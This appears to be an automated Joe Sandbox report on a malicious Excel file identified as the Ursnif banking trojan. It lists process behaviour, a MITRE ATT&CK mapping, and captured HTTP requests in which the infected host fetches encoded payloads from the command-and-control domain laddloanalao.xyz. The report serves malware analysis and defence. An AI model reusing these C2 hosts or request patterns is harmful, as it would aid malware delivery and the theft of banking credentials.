Loading ...

Play interactive tourEdit tour

Analysis Report MIL0001742828.xls

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:194688
Start date:09.12.2019
Start time:17:28:51
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 44s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:MIL0001742828.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:33
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.expl.evad.winXLS@37/56@16/4
EGA Information:
  • Successful, ratio: 50%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 35
  • Number of non-executed functions: 13
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to Italian - Italy
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 40.90.247.210, 40.91.124.111, 192.35.177.64, 67.27.157.254, 8.248.113.254, 8.248.115.254, 67.27.159.254, 67.26.81.254, 8.253.207.120, 8.253.95.249, 8.248.127.254, 67.27.158.126, 172.217.23.238, 216.58.201.100, 72.21.81.200, 152.199.19.161, 13.107.4.50, 13.107.5.80, 204.79.197.200, 13.107.21.200
  • Excluded domains from analysis (whitelisted): www.bing.com, google.com, update.microsoft.com, ie9comview.vo.msecnd.net, dual-a-0001.a-msedge.net, api.bing.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, r20swj13mr.microsoft.com, iecvlist.microsoft.com, e-0001.e-msedge.net, au.au-msedge.net, www.update.microsoft.com.nsatc.net, a-0001.a-afdentry.net.trafficmanager.net, update.microsoft.com.nsatc.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, www.google.com, au.c-0001.c-msedge.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, api-bing-com.e-0001.e-msedge.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 3584 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlImpactNetwork Effects
Valid AccountsWindows Management Instrumentation211Winlogon Helper DLLProcess Injection112Rundll321Credential DumpingSystem Time Discovery1Remote File Copy2Email Collection1Data Encrypted11Remote File Copy2Data Destruction
Replication Through Removable MediaRundll321Port MonitorsAccessibility FeaturesScripting2Network SniffingAccount Discovery1Remote ServicesClipboard Data3Exfiltration Over Other Network MediumStandard Cryptographic Protocol12Data Encrypted for Impact
External Remote ServicesPowerShell3Accessibility FeaturesPath InterceptionObfuscated Files or Information1Input CaptureSecurity Software Discovery111Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Disk Structure Wipe
Drive-by CompromiseScripting2System FirmwareDLL Search Order HijackingMasquerading11Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3Disk Content Wipe
Exploit Public-Facing ApplicationExecution through API1Shortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion3Account ManipulationSystem Information Discovery37Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolService Stop
Spearphishing LinkExploitation for Client Execution1Modify Existing ServiceNew ServiceProcess Injection112Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortInhibit System Recovery
Spearphishing AttachmentGraphical User Interface1Path InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortDefacement
Spearphishing via ServiceCommand-Line Interface111Logon ScriptsProcess InjectionIndicator BlockingBash HistorySystem Owner/User Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolStored Data Manipulation
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptRemote System Discovery11Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionTransmitted Data Manipulation
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Network Configuration Discovery1Taint Shared ContentAudio CaptureTransfer Data to Cloud AccountConnection ProxyRuntime Data Manipulation

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: MIL0001742828.xlsVirustotal: Detection: 16%Perma Link

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00451098 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,8_2_00451098
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exeJump to behavior

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\System32\PING.EXE 'C:\Windows\system32\PING.EXE' update.microsoft.com
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 216.58.201.101 216.58.201.101
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97AC40E5.emfJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /images/sCdH2p9rC/QEWUjhcskJhtMW9G0Ob3/8ujas9efG6k7NSOXraz/KyFwMBjnUtN0zWrGl7dzfE/Iz2JvLTs0tQal/txJUM0Zx/znIHrFkN_2FASixt6Ws7SB8/xgoZDz4pOc/2RHMQbhDsoScncwUV/_2FIDsyvf/XXEf.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: PHPSESSID=m8dpt3lkbmq7bj50qjk4viijg2; lang=en
Source: global trafficHTTP traffic detected: GET /images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoMS_2F8_2Fy6/0rM_2F8LRwLuw_2F/EauVHxmISOjoYNN/_2FY7T2el_2BlMSeFW/_2FLqyftu/fwXJdY6tuyVXii_2F47H/XDlyh_2Ba2Ay8g_2F35/F_2BBnVFrTiBOxAVL_2F4w/hBVHp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global trafficHTTP traffic detected: GET /images/eD_2B_2BIP/yNYJLi3riY9RVC043/FKTGoU_2Bwca/7_2F5IlR9_2/Bxvd12wxNAN5Gm/_2FQuaC3_2Fxa1vUkyrfx/Az2y6e0NYX2pVPdP/5Lep5J1iYneZptK/H8TVkb4hqL5pkBrsve/iv65eT52g/BN6C1a3r5J1hy/7VNxiHcx.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global trafficHTTP traffic detected: GET /images/oTpJ2ZzMtV7la/idgCkWlk/5O2cre58fBwiiKKlpjSXnNE/VvKgyAjcjl/LYYg0XGo4i5LMQjA0/0J_2BCAZ4WoH/vBCfv9hNgac/UYRVYJJYgup4QM/vBNZmgcRevebGCEZj413g/OVOtHkbj1c/mNgLxAUcKR/XQq.avi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: it-ITUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: laddloanalao.xyzDNT: 1Connection: Keep-AliveCookie: lang=en
Found strings which match to known social media urlsShow sources
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: makretplaise.xyz
Urls found in memory or binary dataShow sources
Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.4.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2709755777.08AA0000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
Source: {5A5B55D3-1AA1-11EA-B7AC-B2C276BF9C88}.dat.10.drString found in binary or memory: http://google.com/images/fi1j95CwZU0jZr7eERDjR/LYTX_2B_2Bt1aKsV/MbJnpGbtjjp3sbi/hxvIjD_2BIIaFnpDWx/1
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
Source: imagestore.dat.15.drString found in binary or memory: http://laddloanalao.xyz/favicon.ico
Source: imagestore.dat.15.drString found in binary or memory: http://laddloanalao.xyz/favicon.ico~
Source: {75AD5703-1AA1-11EA-B7AC-B2C276BF9C88}.dat.18.drString found in binary or memory: http://laddloanalao.xyz/images/New4cJoQvo6XtZauz/hyuqnQVHdttc/Y2fQhP_2Bvp/SwIcLle_2BgVQD/gNevLmBadoM
Source: explorer.exe, 0000001E.00000000.2692377330.08110000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.2610098055.03A39000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.2644750191.076B6000.00000004.00000001.sdmp, ~DF00A1094E21FFE937.TMP.15.dr, {7436F613-1AA1-11EA-B7AC-B2C276BF9C88}.dat.15.drString found in binary or memory: http://laddloanalao.xyz/images/sCdH2p9rC/QEWUjhcskJhtMW9G0Ob3/8ujas9efG6k7NSOXraz/KyFwMBjnUtN0zWrGl7
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmpString found in binary or memory: http://schemas.m
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001E.00000000.2729358781.08B59000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
